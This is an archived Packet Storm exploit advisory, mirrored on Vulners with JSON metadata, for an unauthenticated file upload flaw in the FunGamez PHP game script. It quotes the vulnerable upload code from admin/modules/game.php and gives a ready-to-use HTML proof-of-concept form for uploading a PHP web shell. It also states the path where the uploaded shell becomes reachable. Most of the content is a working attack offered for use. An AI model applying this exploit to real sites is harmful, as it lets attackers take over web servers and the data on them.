Search...

FunGamez Remote Shell Upload

2013-08-01T00:00:00

ID PACKETSTORM:122626
Type packetstorm
Reporter cr4wl3r
Modified 2013-08-01T00:00:00

Description

                                        
                                            `# FunGamez Remote File Upload Vulnerability  
# Brought to you by cr4wl3r http://bastardlabs.info  
# Software Link: http://sourceforge.net/projects/fg-gsm/?source=dlp  
# Tested: Linux, Windows  
-----------------------------------------------  
Source [FunGamez]/admin/modules/game.php  
  
..........  
135 &lt;/table&gt;&lt;/form&gt;&lt;?php  
136 }  
137 Else If ( $mode == 'newsave' )  
138 {  
139 If ( $_FILES['src_upload']['name'] != '' && $_POST['src_link'] != '' ) { header('Location: ./index.php?admin&module=game&mode=new&msg=doublesrc'); die(); }  
140 If ( ( $_FILES['src_upload']['name'] == '' && $_POST['src_link'] == '' ) || $_POST['name'] == '' ) { header('Location: ./index.php?admin&module=game&mode=new&msg=reqg'); die(); }  
141 If ( $_FILES['src_upload']['name'] != '' )  
142 {  
143 $src = $_FILES['src_upload']['name'];  
144 move_uploaded_file($_FILES['src_upload']['tmp_name'], './data/flash/'.$_FILES['src_upload']['name']);  
145 }  
..........  
  
  
Proof of concept:  
  
&lt;form action="http://localhost/[FunGamez]/index.php?admin&module=game&mode=newsave" method="POST" enctype="multipart/form-data"&gt;  
&lt;input type="text" name="name" value="blablablablabla" /&gt;&lt;br&gt;  
&lt;input type="file" name="src_upload" /&gt;&lt;br&gt;  
&lt;input type="submit" value="w00tw00t" /&gt;  
  
And your shell will be available here:  
  
http://localhost/[FunGamez]/data/flash/shell.php  
  
-----------------------------------------------  
  
// Gorontalo 31 Juli 2013  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:122626", "type": "packetstorm", "bulletinFamily": "exploit", "title": "FunGamez Remote Shell Upload", "description": "", "published": "2013-08-01T00:00:00", "modified": "2013-08-01T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/122626/FunGamez-Remote-Shell-Upload.html", "reporter": "cr4wl3r", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:21:39", "viewCount": 1, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-11-03T10:21:39", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:39", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/122626/fungamez-shell.txt", "sourceData": "`# FunGamez Remote File Upload Vulnerability \n# Brought to you by cr4wl3r http://bastardlabs.info \n# Software Link: http://sourceforge.net/projects/fg-gsm/?source=dlp \n# Tested: Linux, Windows \n----------------------------------------------- \nSource [FunGamez]/admin/modules/game.php \n \n.......... \n135 </table></form><?php \n136 } \n137 Else If ( $mode == 'newsave' ) \n138 { \n139 If ( $_FILES['src_upload']['name'] != '' && $_POST['src_link'] != '' ) { header('Location: ./index.php?admin&module=game&mode=new&msg=doublesrc'); die(); } \n140 If ( ( $_FILES['src_upload']['name'] == '' && $_POST['src_link'] == '' ) || $_POST['name'] == '' ) { header('Location: ./index.php?admin&module=game&mode=new&msg=reqg'); die(); } \n141 If ( $_FILES['src_upload']['name'] != '' ) \n142 { \n143 $src = $_FILES['src_upload']['name']; \n144 move_uploaded_file($_FILES['src_upload']['tmp_name'], './data/flash/'.$_FILES['src_upload']['name']); \n145 } \n.......... \n \n \nProof of concept: \n \n<form action=\"http://localhost/[FunGamez]/index.php?admin&module=game&mode=newsave\" method=\"POST\" enctype=\"multipart/form-data\"> \n<input type=\"text\" name=\"name\" value=\"blablablablabla\" /><br> \n<input type=\"file\" name=\"src_upload\" /><br> \n<input type=\"submit\" value=\"w00tw00t\" /> \n \nAnd your shell will be available here: \n \nhttp://localhost/[FunGamez]/data/flash/shell.php \n \n----------------------------------------------- \n \n// Gorontalo 31 Juli 2013 \n`\n"}